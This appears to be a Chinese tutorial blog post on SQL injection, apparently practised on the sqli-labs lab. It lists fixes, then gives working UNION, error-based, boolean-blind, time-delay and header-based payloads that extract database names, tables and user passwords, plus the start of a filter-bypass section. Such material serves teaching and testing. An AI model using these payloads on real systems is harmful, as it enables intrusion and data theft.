目录:

一、SQL注入漏洞介绍

二、修复建议

三、通用姿势

四、具体实例

五、各种绕过

一、SQL注入漏洞介绍:

SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于数据库文件系统中的指定文件内容,在某些情况下能对操作系统发布命令。SQL注入攻击是一种注入攻击。它将SQL命令注入到数据层输入,从而影响执行预定义的SQL命令。由于用户的输入,也是SQL语句的一部分,所以攻击者可以利用这部分可以控制的内容,注入自己定义的语句,改变SQL语句执行逻辑,让数据库执行任意自己需要的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何自己需要的数据,利用数据库的一些特性,可以直接获取数据库服务器的系统权限。

二、修复建议

  1. 使用参数化查询接口或在代码级对带入SQL语句中的外部参数进行转义或过滤;
  2. 对于整数,判断变量是否符合[0-9]的值;其他限定值,也可以进行合法性校验;
  3. 对于字符串,对SQL语句特殊字符进行转义(单引号转成两个单引号,双引号转成两个双引号)。

三、通用姿势

3.1 通过以下操作先大概判断是否存在注入点

  1. 如果参数(id)是数字,测试id=2-1与id=1返回的结果是否相同,如果做了2-1=1的运算,说明可能存在数字型注入。如果要用+号运算的话,因为URL编码的问题,需要把加好换成%2B,如id=1%2B1
  2. 在参数后面加单引号或双引号,判断返回结果是否有报错
  3. 添加注释符,判断前后是否有报错,如id=1' --+ 或 id=1" --+ 或id=1' # 或id=1" --+  (--后面跟+号,是把+当成空格使用)
  4. 有些参数可能在括号里面,如:SELECT first_name, last_name FROM users WHERE user_id = ('$id');所以也可以在参数后面加单双引号和括号,如id=1')  --+ 或 id=1") --+ 或id=1') # 或id=1") --+
  5. 参数后面跟or 或者and,判断返回结果是否有变化,如1' or 'a'='a  或者and 'a'='a或者1' or 'a'='b或者1' or '1'='2
  6. 如果返回的正确页面与错误页面都一样,可以考虑时间延迟的方法判断是否存在注入,如  1’ and sleep(5)

3.2 如果存在注入,利用注入获取信息

3.2.1 查询结果如果可以直接返回

利用联合查询一步步的获取信息,如:

// 获取数据库名称,注意联合查询要求前后查询的列数和数据类型必须对应
1' union select schema_name ,1 from information_schema.schemata --
//根据上一步获取的数据库名称,获取表名
1' union select table_name from information_schema.tables where table_schema='database_name'
//根据上面的数据库名称和表名获取字段名
1' union select column_name from information_schema.columns where table_schema='database_name' and table_name='table_name'
//获取字段值,使用group_concat的目的是把查询结果合并成1列,另外,如果跨数据库查询值得花,需要使用数据库名.表明的格式,比如information_schema.schemata
1′ union select group_concat(user_id,first_name,last_name),group_concat(password) from 数据库名.表名

3.2.2 通过报错回显查询结果,如:

#利用报错回显查询到的值,回显当前的数据库名
and extractvalue(1,concat(0x7e,(select database())))
#回显表名
and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' ))) #回显列名
and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))

3.2.3 布尔型注入,如:

 #判断数据库名的长度是多少
SELECT * FROM users where id ='1' and LENGTH(database())=8 # 二分查找发挨个判断数据库名称的每个字母
SELECT * FROM users where id ='1' and ascii(substr((select database()),1,1))>115 #挨个判断此数据库中表的每个字母
SELECT * FROM users where id ='1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>116

3.2.4 时间延迟注入,如:

and IF(ascii(substr((select database()),1,1))>115,1,sleep(5))

四、具体实例

4.1  字符型(参数在单引号内,直接返回结果)

步骤1:参数后面加一个单引号报SQL错误

分析:单引号报错,所以参数在两个单引号里面,通过闭合单引号、联合查询直接查询到数据库数据

步骤2:构造payload

id=0' union select NULL,database(),NULL --+   #查询当前数据库的名称

#爆库名

id=0' union select null,group_concat(schema_name),null from information_schema.schemata --+

#爆表名

id=0' union select null,group_concat(table_name),null from information_schema.tables where table_schema='security' --+

#爆字段名

id=0' union select null,group_concat(column_name),null from information_schema.columns where table_schema='security' and table_name='users' --+

#获取数据库中的数据

id=0' union select null,group_concat(username,0x3a,password),null from security.users--+

4.2  数字型(直接返回结果)

步骤1:id=1与id=2-1返回相同结果,数字型注入

步骤2:构造payload

无需引号闭合,id后面直接跟联合索引就行了

#爆库名

4.3  字符型(参数在单引号和括号内、直接返回结果)

步骤1:输入单引号报错,根据报错可知参数在单引号和括号内

步骤2:闭合查询

用单引号、括号和注释闭合查询,payload: id=1') --+

步骤3:各种爆,与上面的操作相同

4.4  布尔型(参数在单引内、不返回查询结果)

步骤1:输入单引号报错,根据报错得知参数在单引号内,构造id=1' --+返回正确页面,确认存在注入

步骤2:查询结果不返回,根据id=1' and 1=1 --+  与 id=1' and 1=2 --+返回结果不同,判断存在布尔型注入

步骤3:构造payload,先判断数据库名的长度,id=1' ' and LENGTH(database())=8 --+  值等于8的时候返回正确的页面,说明数据库长度为8

步骤4:通过二分查找法,挨个判断数据库名称的每个字母

id=1' and ascii(substr((select database()),1,1))>110  --+  #判断第一个字母的ascii是否大于110,返回正确页面,说明大于110
id=1' and ascii(substr((select database()),1,1))>118  --+  #判断第一个字母的ascii是否大于118,返回不正确页面,说明小与等于118
id=1' and ascii(substr((select database()),1,1))>115  --+  #判断第一个字母的ascii是否大于115,返回不正确页面,说明小与等于115
id=1' and ascii(substr((select database()),1,1))>113  --+  #判断第一个字母的ascii是否大于113,返回正确页面,说明大与113

id=1' and ascii(substr((select database()),1,1))>114  --+  #判断第一个字母的ascii是否大于114,返回正确页面,说明大与114

大于114,小于等于115,第一个字母的ascii值肯定就是115了,所以第一个字母就是s,依次类推可以查到剩下的所有字母。

4.5 布尔型(参数在单引内和两个括号内、不返回查询结果)
步骤1:输入单引号报错,但没有详细的报错提示

步骤2:增加1个括号也报错,增加2个括号返回正确

步骤3:布尔型,不返回查询结果,payload与上面的相同。

4.6 时间延迟注入(无论查询是否正确都返回一样的页面)

步骤1:如论输入什么,都返回一样的页面,所以考虑时间延迟注入

步骤2:直接1 and sleep(5) --+  没延迟,说明查询语句没有闭合成功

步骤3:猜测参数在单引号内,构造payload:id=1' and sleep(5) --+  页面相应延迟,存在注入

步骤4:构造payload,当数据库名长度为8的时候没有延迟,说明数据库名称的长度就是8

id=1'  AND IF(LENGTH(database())=8,1,sleep(10)) --+

步骤5:通过如下方式,挨个判断数据库名的字母

id=1'  and IF(ascii(substr((select database()),1,1))>115,1,sleep(5)) --+

4.7 字符型报错注入(错误值被返回)

步骤1:按下面的测试,username字段存在字符型注入,参数在单引号内

步骤2:username字段输入一些无关的东西,SQL报错详情被回显

步骤3:利用extractvalue函数,让执行的结果以报错的方式显示出来

extractvalue(目标xml文档,xml路径),第二个参数的格式是/xxx/xx/xx/xx,如果格式不正确就会把报错显示出来

构造payload:uname=admin' and extractvalue(1,concat(0x7e,(select database())))--+

4.7 user-agent类型的注入

步骤1:user-agent的值被原封返回了

步骤2:这里需要借助源码审计了,否则不容易猜到真实的sql语句。

如下源码所示,SQL语句是三个字段的insert语句,然后$uagent被返回。

步骤3:结合报错注入,构造payload:

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', extractvalue(1,concat(0x7e,(select database()))),'1') #

4.8 Referer类型的注入
方法与上述相同,先闭合sql语句,然后利用报错返回,payload如下:

Referer: http://127.0.0.1/sql/Less-19/',extractvalue(1,concat(0x7e,(select database()))))#

4.9 Cookie类型的注入

步骤1:输入单引号报错,确认属于cookie类型的注入,而且报错回显了,利用报错回显数据

步骤2:构造payload

Cookie: uname=admin' and extractvalue(1,concat(0x7e,(select database()))) #

五、各种绕过

 5.1 注释符被过滤(--、#)

方法1:union查询中多加一个单引号以便闭合sql语句,比如:

id=0' union select null,database(),'null
id=0' union select null,group_concat(schema_name),null from information_schema.schemata union select null,null,'nul

 5.2 空格被过滤

方法1:使用/**/注释符代替空格

未完待续……

SQL注入漏洞知识总结的更多相关文章

  1. 从c#角度看万能密码SQL注入漏洞

    以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞, ...

  2. WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案(转)

    对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...

  3. WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案

    对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...

  4. 利用SQL注入漏洞登录后台的实现方法

    利用SQL注入漏洞登录后台的实现方法 作者: 字体:[增加 减小] 类型:转载 时间:2012-01-12我要评论 工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意.读 ...

  5. PHPCMS \phpcms\modules\member\index.php 用户登陆SQL注入漏洞分析

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: POC http://localhost/p ...

  6. SQL注入漏洞技术的详解

    SQL注入漏洞详解 目录 SQL注入的分类 判断是否存在SQL注入 一:Boolean盲注 二:union 注入 三:文件读写 四:报错注入 floor报错注入 ExtractValue报错注入 Up ...

  7. SQL注入漏洞详解

    目录 SQL注入的分类 判断是否存在SQL注入 一:Boolean盲注 二:union 注入 三:文件读写 四:报错注入 floor报错注入 ExtractValue报错注入 UpdateXml报错注 ...

  8. 代码审计(1):sql注入漏洞

    挖掘经验:sql注入经常出现在登录界面.获取HTTP请求头.订单处理等地方.而登录界面的注入现在来说大多是发生在HTTP头里面的client-ip和x-forward-for,一般用来记录登录的ip地 ...

  9. PHP代码审计入门(SQL注入漏洞挖掘基础)

    SQL注入漏洞 SQL注入经常出现在登陆页面.和获取HTTP头(user-agent/client-ip等).订单处理等地方,因为这几个地方是业务相对复杂的,登陆页面的注入现在来说大多数是发生在HTT ...

随机推荐

  1. PHP基础知识试题

    转载于:http://www.php.cn/toutiao-415599.html 1.PHP中传值与传引用的区别,什么时候传值,什么时候传引用? 按值传递:函数范围内对值任何改变在函数外部都会被忽略 ...

  2. java class file

    目录 什么是java类文件 幻数 主次版本号 常量池数和常量池 this_class super_class 接口数量和接口 字段数和字段 方法数和方法 以下内容主要还是参考<Inside JV ...

  3. JMeter学习笔记(一) 工具的安装和基本介绍

    因为网上的资料比较多,就不多描述了,在此引用了其他大神的文档,用于学习 这个文档中有比较详细的jmeter工具介绍: https://wenku.baidu.com/view/64f3a5f75901 ...

  4. eclipse查看源代码问题

    最近分析源代码时,eclipse总是出错,显示org.eclipse.core.runtime.CoreException,解决方法:在builderpath点击 add external jars, ...

  5. JSP整理

    JSP全称Java Server Pages,是一种动态网页开发技术.它使用JSP标签在HTML网页中插入Java代码.标签通常以<%开头以%>结束. JSP是一种Java servlet ...

  6. 《More Effective C++ 》读书笔记(二)Exception 异常

    这事篇读书笔记,只记录自己的理解和总结,一般情况不对其举例子具体说明,因为那正是书本身做的事情,我的笔记作为梳理和复习之用,划重点.我推荐学C++的人都好好读一遍Effective C++ 系列,真是 ...

  7. 用Python爬下今日头条所有美女,美滋滋!

      我们的学习爬虫的动力是什么? 有人可能会说:如果我学好了,我可以找一个高薪的工作. 有人可能会说:我学习编程希望能够为社会做贡献(手动滑稽) 有人可能会说:为了妹子! ..... 其实我们会发现妹 ...

  8. 苹果没放弃手写笔 这样的iPad你想要吗?

    12 月 31 日,美国专利与商标局(The U.S. Patent and Trademark Office)当地时间周四批准了一项来自苹果的专利申请,该专利主要描述的是一种可以通过陀螺仪.无线通讯 ...

  9. 动态语言的灵活性是把双刃剑 -- 以 Python 语言为例

    本文有些零碎,总题来说,包括两个问题:(1)可变对象(最常见的是list dict)被意外修改的问题,(2)对参数(parameter)的检查问题.这两个问题,本质都是因为动态语言(动态类型语言)的特 ...

  10. scrum立会报告+燃尽图(第三周第五次)

    此作业要求参见:https://edu.cnblogs.com/campus/nenu/2018fall/homework/2286 项目地址:https://coding.net/u/wuyy694 ...